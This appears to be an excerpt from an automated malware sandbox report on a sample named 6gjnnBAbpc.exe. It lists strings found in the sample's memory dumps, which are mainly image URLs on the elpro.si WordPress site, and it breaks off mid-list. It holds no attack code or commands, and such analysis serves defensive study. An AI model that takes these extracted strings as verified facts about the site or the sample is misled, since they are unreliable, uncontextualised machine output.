                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2-600x338.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2-64x36.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2-768x432.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-1170x658.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-1536x864.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-355x200.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-585x330.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-600x338.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-64x36.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-768x432.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/03/MONITORING.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 